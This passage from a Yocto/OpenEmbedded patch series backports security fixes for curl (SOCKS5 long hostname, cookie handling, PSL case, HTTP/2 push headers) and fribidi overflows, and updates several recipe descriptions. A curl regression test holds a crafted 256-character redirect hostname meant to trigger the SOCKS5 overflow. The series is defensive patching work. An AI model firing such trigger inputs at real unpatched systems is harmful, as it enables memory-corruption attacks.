26Upstream-Status: Backport [fb4415d8aee6c1045be932a34fe6107c2f5ed147]
27Signed-off-by: Mike Crowe <mac@mcrowe.com>
28---
29 lib/socks.c | 13 +++++----
30 tests/data/Makefile.inc | 2 +-
31 tests/data/test728 | 60 +++++++++++++++++++++++++++++++++++++++++
32 3 files changed, 69 insertions(+), 6 deletions(-)
33 create mode 100644 tests/data/test728
34
35diff --git a/lib/socks.c b/lib/socks.c
36index 37099130e..f3bf40533 100644
37--- a/lib/socks.c
38+++ b/lib/socks.c
39@@ -521,11 +521,14 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
40 infof(conn->data, "SOCKS5: connecting to HTTP proxy %s port %d\n",
41 hostname, remote_port);
42
43- /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
44+ /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet. */
45 if(!socks5_resolve_local && hostname_len > 255) {
46- infof(conn->data, "SOCKS5: server resolving disabled for hostnames of "
47- "length > 255 [actual len=%zu]\n", hostname_len);
48- socks5_resolve_local = TRUE;
49+ failf(data, "SOCKS5: the destination hostname is too long to be "
50+ "resolved remotely by the proxy.");
51+ /* This version of libcurl doesn't have CURLE_PROXY and
52+ * therefore CURLPX_LONG_HOSTNAME, so let's report the best we
53+ * can. */
54+ return CURLE_COULDNT_RESOLVE_HOST;
55 }
56
57 if(auth & ~(CURLAUTH_BASIC | CURLAUTH_GSSAPI))
58@@ -837,7 +840,7 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
59
60 if(!socks5_resolve_local) {
61 socksreq[len++] = 3; /* ATYP: domain name = 3 */
62- socksreq[len++] = (char) hostname_len; /* one byte address length */
63+ socksreq[len++] = (unsigned char) hostname_len; /* one byte length */
64 memcpy(&socksreq[len], hostname, hostname_len); /* address w/o NULL */
65 len += hostname_len;
66 infof(data, "SOCKS5 connect to %s:%d (remotely resolved)\n",
67diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
68index 3d8565c36..5ee2284ff 100644
69--- a/tests/data/Makefile.inc
70+++ b/tests/data/Makefile.inc
71@@ -89,7 +89,7 @@ test662 test663 test664 test665 test666 test667 test668 \
72 test670 test671 test672 test673 \
73 \
74 test700 test701 test702 test703 test704 test705 test706 test707 test708 \
75-test709 test710 test711 test712 test713 test714 test715 test716 test717 \
76+test709 test710 test711 test712 test713 test714 test715 test716 test717 test728 \
77 \
78 test800 test801 test802 test803 test804 test805 test806 test807 test808 \
79 test809 test810 test811 test812 test813 test814 test815 test816 test817 \
80diff --git a/tests/data/test728 b/tests/data/test728
81new file mode 100644
82index 000000000..7b1d8b2f3
83--- /dev/null
84+++ b/tests/data/test728
85@@ -0,0 +1,60 @@
86+<testcase>
87+<info>
88+<keywords>
89+HTTP
90+HTTP GET
91+SOCKS5
92+SOCKS5h
93+followlocation
94+</keywords>
95+</info>
96+
97+#
98+# Server-side
99+<reply>
100+# The hostname in this redirect is 256 characters and too long (> 255) for
101+# SOCKS5 remote resolve. curl must return error CURLE_PROXY in this case.
102+<data>
103+HTTP/1.1 301 Moved Permanently
104+Location: http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
105+Content-Length: 0
106+Connection: close
107+
108+</data>
109+</reply>
110+
111+#
112+# Client-side
113+<client>
114+<features>
115+proxy
116+</features>
117+<server>
118+http
119+socks5
120+</server>
121+ <name>
122+SOCKS5h with HTTP redirect to hostname too long
123+ </name>
124+ <command>
125+--no-progress-meter --location --proxy socks5h://%HOSTIP:%SOCKSPORT http://%HOSTIP:%HTTPPORT/728
126+</command>
127+</client>
128+
129+#
130+# Verify data after the test has been "shot"
131+<verify>
132+<strip>
133+^User-Agent:.*
134+</strip>
135+<protocol>
136+GET /728 HTTP/1.1
137+Host: %HOSTIP:%HTTPPORT
138+Accept: */*
139+
140+</protocol>
141+<errorcode>
142+6
143+</errorcode>
144+</verify>
145+</testcase>
146--
1472.39.2
148
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38546.patch b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
new file mode 100644
index 0000000000..30ef2fd038
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
@@ -0,0 +1,132 @@
1From 7b67721f12cbe6ed1a41e7332f3b5a7186a5e23f Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Thu, 14 Sep 2023 23:28:32 +0200
4Subject: [PATCH] cookie: remove unnecessary struct fields
5To: libcurl development <curl-library@cool.haxx.se>
6
7Plus: reduce the hash table size from 256 to 63. It seems unlikely to
8make much of a speed difference for most use cases but saves 1.5KB of
9data per instance.
10
11Closes #11862
12
13This patch taken from Debian's 7.64.0-4+deb10u7 package which applied with
14only a little fuzz.
15
16CVE: CVE-2023-38546
17Upstream-Status: Backport [61275672b46d9abb32857404]
18Signed-off-by: Mike Crowe <mac@mcrowe.com>
19---
20 lib/cookie.c | 13 +------------
21 lib/cookie.h | 7 ++-----
22 lib/easy.c | 4 +---
23 3 files changed, 4 insertions(+), 20 deletions(-)
24
25diff --git a/lib/cookie.c b/lib/cookie.c
26index 68054e1c4..a378f28e1 100644
27--- a/lib/cookie.c
28+++ b/lib/cookie.c
29@@ -114,7 +114,6 @@ static void freecookie(struct Cookie *co)
30 free(co->name);
31 free(co->value);
32 free(co->maxage);
33- free(co->version);
34 free(co);
35 }
36
37@@ -641,11 +640,7 @@ Curl_cookie_add(struct Curl_easy *data,
38 }
39 }
40 else if(strcasecompare("version", name)) {
41- strstore(&co->version, whatptr);
42- if(!co->version) {
43- badcookie = TRUE;
44- break;
45- }
46+ /* just ignore */
47 }
48 else if(strcasecompare("max-age", name)) {
49 /* Defined in RFC2109:
50@@ -1042,7 +1037,6 @@ Curl_cookie_add(struct Curl_easy *data,
51 free(clist->path);
52 free(clist->spath);
53 free(clist->expirestr);
54- free(clist->version);
55 free(clist->maxage);
56
57 *clist = *co; /* then store all the new data */
58@@ -1111,9 +1105,6 @@ struct CookieInfo *Curl_cookie_init(struct Curl_easy *data,
59 c = calloc(1, sizeof(struct CookieInfo));
60 if(!c)
61 return NULL; /* failed to get memory */
62- c->filename = strdup(file?file:"none"); /* copy the name just in case */
63- if(!c->filename)
64- goto fail; /* failed to get memory */
65 }
66 else {
67 /* we got an already existing one, use that */
68@@ -1241,7 +1232,6 @@ static struct Cookie *dup_cookie(struct Cookie *src)
69 CLONE(name);
70 CLONE(value);
71 CLONE(maxage);
72- CLONE(version);
73 d->expires = src->expires;
74 d->tailmatch = src->tailmatch;
75 d->secure = src->secure;
76@@ -1457,7 +1447,6 @@ void Curl_cookie_cleanup(struct CookieInfo *c)
77 {
78 if(c) {
79 unsigned int i;
80- free(c->filename);
81 for(i = 0; i < COOKIE_HASH_SIZE; i++)
82 Curl_cookie_freelist(c->cookies[i]);
83 free(c); /* free the base struct as well */
84diff --git a/lib/cookie.h b/lib/cookie.h
85index b3865e601..2e667cda0 100644
86--- a/lib/cookie.h
87+++ b/lib/cookie.h
88@@ -36,8 +36,6 @@ struct Cookie {
89 char *expirestr; /* the plain text version */
90 bool tailmatch; /* whether we do tail-matching of the domain name */
91
92- /* RFC 2109 keywords. Version=1 means 2109-compliant cookie sending */
93- char *version; /* Version = <value> */
94 char *maxage; /* Max-Age = <value> */
95
96 bool secure; /* whether the 'secure' keyword was used */
97@@ -54,15 +52,14 @@ struct Cookie {
98 #define COOKIE_PREFIX__SECURE (1<<0)
99 #define COOKIE_PREFIX__HOST (1<<1)
100
101-#define COOKIE_HASH_SIZE 256
102+#define COOKIE_HASH_SIZE 63
103
104 struct CookieInfo {
105 /* linked list of cookies we know of */
106 struct Cookie *cookies[COOKIE_HASH_SIZE];
107
108- char *filename; /* file we read from/write to */
109 bool running; /* state info, for cookie adding information */
110- long numcookies; /* number of cookies in the "jar" */
111+ int numcookies; /* number of cookies in the "jar" */
112 bool newsession; /* new session, discard session cookies on load */
113 int lastct; /* last creation-time used in the jar */
114 };
115diff --git a/lib/easy.c b/lib/easy.c
116index b648e80c1..cdca0fb03 100644
117--- a/lib/easy.c
118+++ b/lib/easy.c
119@@ -840,9 +840,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
120 if(data->cookies) {
121 /* If cookies are enabled in the parent handle, we enable them
122 in the clone as well! */
123- outcurl->cookies = Curl_cookie_init(data,
124- data->cookies->filename,
125- outcurl->cookies,
126+ outcurl->cookies = Curl_cookie_init(data, NULL, outcurl->cookies,
127 data->set.cookiesession);
128 if(!outcurl->cookies)
129 goto fail;
130--
1312.39.2
132
diff --git a/meta/recipes-support/curl/curl/CVE-2023-46218.patch b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
new file mode 100644
index 0000000000..c9677b6a84
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
@@ -0,0 +1,52 @@
1CVE: CVE-2023-46218
2Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.68.0-1ubuntu2.21.debian.tar.xz upstream https://github.com/curl/curl/commit/2b0994c29a721c91c57 ]
3Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
4
5Backport of:
6
7From 2b0994c29a721c91c572cff7808c572a24d251eb Mon Sep 17 00:00:00 2001
8From: Daniel Stenberg <daniel@haxx.se>
9Date: Thu, 23 Nov 2023 08:15:47 +0100
10Subject: [PATCH] cookie: lowercase the domain names before PSL checks
11
12Reported-by: Harry Sintonen
13
14Closes #12387
15---
16 lib/cookie.c | 24 ++++++++++++++++--------
17 1 file changed, 16 insertions(+), 8 deletions(-)
18
19--- a/lib/cookie.c
20+++ b/lib/cookie.c
21@@ -967,15 +967,23 @@ Curl_cookie_add(struct Curl_easy *data,
22 #ifdef USE_LIBPSL
23 /* Check if the domain is a Public Suffix and if yes, ignore the cookie. */
24 if(domain && co->domain && !isip(co->domain)) {
25- const psl_ctx_t *psl = Curl_psl_use(data);
26- int acceptable;
27-
28- if(psl) {
29- acceptable = psl_is_cookie_domain_acceptable(psl, domain, co->domain);
30- Curl_psl_release(data);
31+ bool acceptable = FALSE;
32+ char lcase[256];
33+ char lcookie[256];
34+ size_t dlen = strlen(domain);
35+ size_t clen = strlen(co->domain);
36+ if((dlen < sizeof(lcase)) && (clen < sizeof(lcookie))) {
37+ const psl_ctx_t *psl = Curl_psl_use(data);
38+ if(psl) {
39+ /* the PSL check requires lowercase domain name and pattern */
40+ Curl_strntolower(lcase, domain, dlen + 1);
41+ Curl_strntolower(lcookie, co->domain, clen + 1);
42+ acceptable = psl_is_cookie_domain_acceptable(psl, lcase, lcookie);
43+ Curl_psl_release(data);
44+ }
45+ else
46+ acceptable = !bad_domain(domain);
47 }
48- else
49- acceptable = !bad_domain(domain);
50
51 if(!acceptable) {
52 infof(data, "cookie '%s' dropped, domain '%s' must not "
diff --git a/meta/recipes-support/curl/curl/CVE-2024-2398.patch b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
new file mode 100644
index 0000000000..a3840336f0
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
@@ -0,0 +1,88 @@
1Backport of:
2
3From deca8039991886a559b67bcd6701db800a5cf764 Mon Sep 17 00:00:00 2001
4From: Stefan Eissing <stefan@eissing.org>
5Date: Wed, 6 Mar 2024 09:36:08 +0100
6Subject: [PATCH] http2: push headers better cleanup
7
8- provide common cleanup method for push headers
9
10Closes #13054
11
12Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2024-2398.patch?h=ubuntu/focal-security
13Upstream commit https://github.com/curl/curl/commit/deca8039991886a559b67bcd6701db800a5cf764]
14CVE: CVE-2024-2398
15Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
16---
17 lib/http2.c | 34 +++++++++++++++-------------------
18 1 file changed, 15 insertions(+), 19 deletions(-)
19
20--- a/lib/http2.c
21+++ b/lib/http2.c
22@@ -515,6 +515,15 @@ static struct Curl_easy *duphandle(struc
23 }
24
25
26+static void free_push_headers(struct HTTP *stream)
27+{
28+ size_t i;
29+ for(i = 0; i<stream->push_headers_used; i++)
30+ free(stream->push_headers[i]);
31+ Curl_safefree(stream->push_headers);
32+ stream->push_headers_used = 0;
33+}
34+
35 static int push_promise(struct Curl_easy *data,
36 struct connectdata *conn,
37 const nghttp2_push_promise *frame)
38@@ -528,7 +537,6 @@ static int push_promise(struct Curl_easy
39 struct curl_pushheaders heads;
40 CURLMcode rc;
41 struct http_conn *httpc;
42- size_t i;
43 /* clone the parent */
44 struct Curl_easy *newhandle = duphandle(data);
45 if(!newhandle) {
46@@ -557,11 +565,7 @@ static int push_promise(struct Curl_easy
47 Curl_set_in_callback(data, false);
48
49 /* free the headers again */
50- for(i = 0; i<stream->push_headers_used; i++)
51- free(stream->push_headers[i]);
52- free(stream->push_headers);
53- stream->push_headers = NULL;
54- stream->push_headers_used = 0;
55+ free_push_headers(stream);
56
57 if(rv) {
58 /* denied, kill off the new handle again */
59@@ -995,10 +999,10 @@ static int on_header(nghttp2_session *se
60 stream->push_headers_alloc) {
61 char **headp;
62 stream->push_headers_alloc *= 2;
63- headp = Curl_saferealloc(stream->push_headers,
64- stream->push_headers_alloc * sizeof(char *));
65+ headp = realloc(stream->push_headers,
66+ stream->push_headers_alloc * sizeof(char *));
67 if(!headp) {
68- stream->push_headers = NULL;
69+ free_push_headers(stream);
70 return NGHTTP2_ERR_TEMPORAL_CALLBACK_FAILURE;
71 }
72 stream->push_headers = headp;
73@@ -1179,14 +1183,7 @@ void Curl_http2_done(struct Curl_easy *d
74 if(http->header_recvbuf) {
75 Curl_add_buffer_free(&http->header_recvbuf);
76 Curl_add_buffer_free(&http->trailer_recvbuf);
77- if(http->push_headers) {
78- /* if they weren't used and then freed before */
79- for(; http->push_headers_used > 0; --http->push_headers_used) {
80- free(http->push_headers[http->push_headers_used - 1]);
81- }
82- free(http->push_headers);
83- http->push_headers = NULL;
84- }
85+ free_push_headers(http);
86 }
87
88 if(!httpc->h2) /* not HTTP/2 ? */
diff --git a/meta/recipes-support/curl/curl_7.69.1.bb b/meta/recipes-support/curl/curl_7.69.1.bb
index c3d629108a..2f351d585a 100644
--- a/meta/recipes-support/curl/curl_7.69.1.bb
+++ b/meta/recipes-support/curl/curl_7.69.1.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Command line tool and library for client-side URL transfers" 1SUMMARY = "Command line tool and library for client-side URL transfers"
2DESCRIPTION = "It uses URL syntax to transfer data to and from servers. \
3curl is a widely used because of its ability to be flexible and complete \
4complex tasks. For example, you can use curl for things like user authentication, \
5HTTP post, SSL connections, proxy support, FTP uploads, and more!"
2HOMEPAGE = "http://curl.haxx.se/" 6HOMEPAGE = "http://curl.haxx.se/"
3BUGTRACKER = "http://curl.haxx.se/mail/list.cgi?list=curl-tracker" 7BUGTRACKER = "http://curl.haxx.se/mail/list.cgi?list=curl-tracker"
4SECTION = "console/network" 8SECTION = "console/network"
@@ -13,6 +17,48 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \
13 file://CVE-2020-8284.patch \ 17 file://CVE-2020-8284.patch \
14 file://CVE-2020-8285.patch \ 18 file://CVE-2020-8285.patch \
15 file://CVE-2020-8286.patch \ 19 file://CVE-2020-8286.patch \
20 file://CVE-2021-22876.patch \
21 file://CVE-2021-22890.patch \
22 file://CVE-2021-22898.patch \
23 file://CVE-2021-22924.patch \
24 file://CVE-2021-22925.patch \
25 file://CVE-2021-22946-pre1.patch \
26 file://CVE-2021-22946.patch \
27 file://CVE-2021-22947.patch \
28 file://CVE-2022-27776.patch \
29 file://CVE-2022-27775.patch \
30 file://CVE-2022-22576.patch \
31 file://CVE-2022-27774-1.patch \
32 file://CVE-2022-27774-2.patch \
33 file://CVE-2022-27774-3.patch \
34 file://CVE-2022-27774-4.patch \
35 file://CVE-2022-27781.patch \
36 file://CVE-2022-27782-1.patch \
37 file://CVE-2022-27782-2.patch \
38 file://CVE-2022-32206.patch \
39 file://CVE-2022-32207.patch \
40 file://CVE-2022-32208.patch \
41 file://CVE-2022-35252.patch \
42 file://CVE-2022-32221.patch \
43 file://CVE-2022-35260.patch \
44 file://CVE-2022-43552.patch \
45 file://CVE-2023-23916.patch \
46 file://CVE-2023-27534-pre1.patch \
47 file://CVE-2023-27534.patch \
48 file://CVE-2023-27538.patch \
49 file://CVE-2023-27533.patch \
50 file://CVE-2023-27535-pre1.patch \
51 file://CVE-2023-27535.patch \
52 file://CVE-2023-27536.patch \
53 file://CVE-2023-28320.patch \
54 file://CVE-2023-28320-fol1.patch \
55 file://CVE-2023-32001.patch \
56 file://CVE-2023-38545.patch \
57 file://CVE-2023-38546.patch \
58 file://CVE-2023-28321.patch \
59 file://CVE-2023-28322.patch \
60 file://CVE-2023-46218.patch \
61 file://CVE-2024-2398.patch \
16" 62"
17 63
18SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42" 64SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42"
@@ -20,6 +66,15 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5
20 66
21# Curl has used many names over the years... 67# Curl has used many names over the years...
22CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl" 68CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl"
69CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-2021-22945"
70
71# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897
72# and https://ubuntu.com/security/CVE-2021-22897
73# This CVE issue affects Windows only Hence whitelisting this CVE
74CVE_CHECK_WHITELIST += "CVE-2021-22897"
75
76# This CVE reports that apple had to upgrade curl because of other already reported CVEs
77CVE_CHECK_WHITELIST += "CVE-2023-42915"
23 78
24inherit autotools pkgconfig binconfig multilib_header 79inherit autotools pkgconfig binconfig multilib_header
25 80
diff --git a/meta/recipes-support/db/db_5.3.28.bb b/meta/recipes-support/db/db_5.3.28.bb
index 318efcb61d..b2ae98f05c 100644
--- a/meta/recipes-support/db/db_5.3.28.bb
+++ b/meta/recipes-support/db/db_5.3.28.bb
@@ -10,11 +10,12 @@
10# same system at the same time if really necessary. 10# same system at the same time if really necessary.
11SECTION = "libs" 11SECTION = "libs"
12SUMMARY = "Berkeley Database v5" 12SUMMARY = "Berkeley Database v5"
13DESCRIPTION = "Provides the foundational storage services for your application, no matter how demanding and unique your requirements may seem to be"
13HOMEPAGE = "https://www.oracle.com/database/technologies/related/berkeleydb.html" 14HOMEPAGE = "https://www.oracle.com/database/technologies/related/berkeleydb.html"
14LICENSE = "Sleepycat" 15LICENSE = "Sleepycat"
15RCONFLICTS_${PN} = "db3" 16RCONFLICTS_${PN} = "db3"
16 17
17CVE_PRODUCT = "oracle_berkeley_db" 18CVE_PRODUCT = "oracle_berkeley_db berkeley_db"
18CVE_VERSION = "11.2.${PV}" 19CVE_VERSION = "11.2.${PV}"
19 20
20PR = "r1" 21PR = "r1"
diff --git a/meta/recipes-support/debianutils/debianutils_4.9.1.bb b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
index 904c52780f..8603fecbd0 100644
--- a/meta/recipes-support/debianutils/debianutils_4.9.1.bb
+++ b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
@@ -1,4 +1,9 @@
1SUMMARY = "Miscellaneous utilities specific to Debian" 1SUMMARY = "Miscellaneous utilities specific to Debian"
2DESCRIPTION = "Provides a number of small utilities which are used \
3primarily by the installation scripts of Debian packages, although \
4you may use them directly. "
5HOMEPAGE = "https://packages.debian.org/sid/debianutils"
6BUGTRACKER = "https://bugs.debian.org/cgi-bin/pkgreport.cgi?pkg=debianutils;dist=unstable"
2SECTION = "base" 7SECTION = "base"
3LICENSE = "GPLv2 & SMAIL_GPL" 8LICENSE = "GPLv2 & SMAIL_GPL"
4LIC_FILES_CHKSUM = "file://debian/copyright;md5=f01a5203d50512fc4830b4332b696a9f" 9LIC_FILES_CHKSUM = "file://debian/copyright;md5=f01a5203d50512fc4830b4332b696a9f"
diff --git a/meta/recipes-support/diffoscope/diffoscope_136.bb b/meta/recipes-support/diffoscope/diffoscope_172.bb
index 3e3e1dfc00..b26713c47f 100644
--- a/meta/recipes-support/diffoscope/diffoscope_136.bb
+++ b/meta/recipes-support/diffoscope/diffoscope_172.bb
@@ -7,12 +7,19 @@ PYPI_PACKAGE = "diffoscope"
7 7
8inherit pypi setuptools3 8inherit pypi setuptools3
9 9
10SRC_URI[md5sum] = "c84d8d308a40176ba2f5dc4abdbf6f73" 10SRC_URI[sha256sum] = "5ffe7f38555c6409bc7e7edc277ed77dd78641fe1306fc38d153dbbe445ddea4"
11SRC_URI[sha256sum] = "0d6486d6eb6e0445ba21fee2e8bdd3a366ce786bfac98e00e5a95038b7815f15"
12 11
13RDEPENDS_${PN} += "binutils vim squashfs-tools python3-libarchive-c python3-magic" 12RDEPENDS_${PN} += "binutils vim squashfs-tools python3-libarchive-c python3-magic"
14 13
15# Dependencies don't build for musl 14# Dependencies don't build for musl
16COMPATIBLE_HOST_libc-musl = 'null' 15COMPATIBLE_HOST_libc-musl = 'null'
17 16
17do_install_append_class-native() {
18 create_wrapper ${D}${bindir}/diffoscope \
19 MAGIC=${STAGING_DIR_NATIVE}${datadir_native}/misc/magic.mgc \
20 RPM_CONFIGDIR=${STAGING_LIBDIR_NATIVE}/rpm \
21 LD_LIBRARY_PATH=${STAGING_LIBDIR_NATIVE} \
22 RPM_ETCCONFIGDIR=${STAGING_DIR_NATIVE}
23}
24
18BBCLASSEXTEND = "native" 25BBCLASSEXTEND = "native"
diff --git a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
index 1623285fd0..ea34e4c7a3 100644
--- a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
+++ b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
@@ -8,7 +8,7 @@ SECTION = "support"
8LICENSE = "BSD-2-Clause" 8LICENSE = "BSD-2-Clause"
9LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32" 9LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32"
10 10
11SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix" 11SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master"
12UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))" 12UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))"
13 13
14SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197" 14SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197"
diff --git a/meta/recipes-support/enchant/enchant2_2.2.8.bb b/meta/recipes-support/enchant/enchant2_2.2.8.bb
index 4ddbe55da5..7c624efea3 100644
--- a/meta/recipes-support/enchant/enchant2_2.2.8.bb
+++ b/meta/recipes-support/enchant/enchant2_2.2.8.bb
@@ -1,6 +1,9 @@
1SUMMARY = "Enchant Spell checker API Library" 1SUMMARY = "Enchant Spell checker API Library"
2DESCRIPTION = "A library (and command-line program) that wraps a number of \
3different spelling libraries and programs with a consistent interface."
2SECTION = "libs" 4SECTION = "libs"
3HOMEPAGE = "https://abiword.github.io/enchant/" 5HOMEPAGE = "https://abiword.github.io/enchant/"
6BUGTRACKER = "https://github.com/AbiWord/enchant/issues/"
4LICENSE = "LGPLv2.1+" 7LICENSE = "LGPLv2.1+"
5LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=a916467b91076e631dd8edb7424769c7" 8LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=a916467b91076e631dd8edb7424769c7"
6 9
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
new file mode 100644
index 0000000000..8f2c2ade0e
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
@@ -0,0 +1,50 @@
1From ad3a19e6372b1e667128ed1ea2f49919884587e1 Mon Sep 17 00:00:00 2001
2From: Akira TAGOH <akira@tagoh.org>
3Date: Thu, 17 Feb 2022 17:30:12 +0900
4Subject: [PATCH] Fix the stack buffer overflow issue
5
6strlen() could returns 0. Without a conditional check for len,
7accessing S_ pointer with len - 1 may causes a stack buffer overflow.
8
9AddressSanitizer reports this like:
10==1219243==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdce043c1f at pc 0x000000403547 bp 0x7ffdce0
1143b30 sp 0x7ffdce043b28
12READ of size 1 at 0x7ffdce043c1f thread T0
13 #0 0x403546 in main ../bin/fribidi-main.c:393
14 #1 0x7f226804e58f in __libc_start_call_main (/lib64/libc.so.6+0x2d58f)
15 #2 0x7f226804e648 in __libc_start_main_impl (/lib64/libc.so.6+0x2d648)
16 #3 0x4036f4 in _start (/tmp/fribidi/build/bin/fribidi+0x4036f4)
17
18Address 0x7ffdce043c1f is located in stack of thread T0 at offset 63 in frame
19 #0 0x4022bf in main ../bin/fribidi-main.c:193
20
21 This frame has 5 object(s):
22 [32, 36) 'option_index' (line 233)
23 [48, 52) 'base' (line 386)
24 [64, 65064) 'S_' (line 375) <== Memory access at offset 63 underflows this variable
25 [65328, 130328) 'outstring' (line 385)
26 [130592, 390592) 'logical' (line 384)
27
28This fixes https://github.com/fribidi/fribidi/issues/181
29
30CVE: CVE-2022-25308
31Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/ad3a19e6372b1e667128ed1ea2f49919884587e1]
32Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
33
34---
35 bin/fribidi-main.c | 2 +-
36 1 file changed, 1 insertion(+), 1 deletion(-)
37
38diff --git a/bin/fribidi-main.c b/bin/fribidi-main.c
39index 3cf9fe1..3ae4fb6 100644
40--- a/bin/fribidi-main.c
41+++ b/bin/fribidi-main.c
42@@ -390,7 +390,7 @@ FRIBIDI_END_IGNORE_DEPRECATIONS
43 S_[sizeof (S_) - 1] = 0;
44 len = strlen (S_);
45 /* chop */
46- if (S_[len - 1] == '\n')
47+ if (len > 0 && S_[len - 1] == '\n')
48 {
49 len--;
50 S_[len] = '\0';
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
new file mode 100644
index 0000000000..0efba3d05c
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
@@ -0,0 +1,31 @@
1From f22593b82b5d1668d1997dbccd10a9c31ffea3b3 Mon Sep 17 00:00:00 2001
2From: Dov Grobgeld <dov.grobgeld@gmail.com>
3Date: Fri, 25 Mar 2022 09:09:49 +0300
4Subject: [PATCH] Protected against garbage in the CapRTL encoder
5
6CVE: CVE-2022-25309
7Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3]
8Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
9
10---
11 lib/fribidi-char-sets-cap-rtl.c | 7 ++++++-
12 1 file changed, 6 insertions(+), 1 deletion(-)
13
14diff --git a/lib/fribidi-char-sets-cap-rtl.c b/lib/fribidi-char-sets-cap-rtl.c
15index b0c0e4a..f74e010 100644
16--- a/lib/fribidi-char-sets-cap-rtl.c
17+++ b/lib/fribidi-char-sets-cap-rtl.c
18@@ -232,7 +232,12 @@ fribidi_cap_rtl_to_unicode (
19 }
20 }
21 else
22- us[j++] = caprtl_to_unicode[(int) s[i]];
23+ {
24+ if ((int)s[i] < 0)
25+ us[j++] = '?';
26+ else
27+ us[j++] = caprtl_to_unicode[(int) s[i]];
28+ }
29 }
30
31 return j;
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
new file mode 100644
index 0000000000..d79a82d648
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
@@ -0,0 +1,30 @@
1From 175850b03e1af251d705c1d04b2b9b3c1c06e48f Mon Sep 17 00:00:00 2001
2From: Akira TAGOH <akira@tagoh.org>
3Date: Thu, 17 Feb 2022 19:06:10 +0900
4Subject: [PATCH] Fix SEGV issue in fribidi_remove_bidi_marks
5
6Escape from fribidi_remove_bidi_marks() immediately if str is null.
7
8This fixes https://github.com/fribidi/fribidi/issues/183
9
10CVE: CVE-2022-25310
11Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/175850b03e1af251d705c1d04b2b9b3c1c06e48f]
12Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
13
14---
15 lib/fribidi.c | 2 +-
16 1 file changed, 1 insertion(+), 1 deletion(-)
17
18diff --git a/lib/fribidi.c b/lib/fribidi.c
19index f5da0da..70bdab2 100644
20--- a/lib/fribidi.c
21+++ b/lib/fribidi.c
22@@ -74,7 +74,7 @@ fribidi_remove_bidi_marks (
23 fribidi_boolean status = false;
24
25 if UNLIKELY
26- (len == 0)
27+ (len == 0 || str == NULL)
28 {
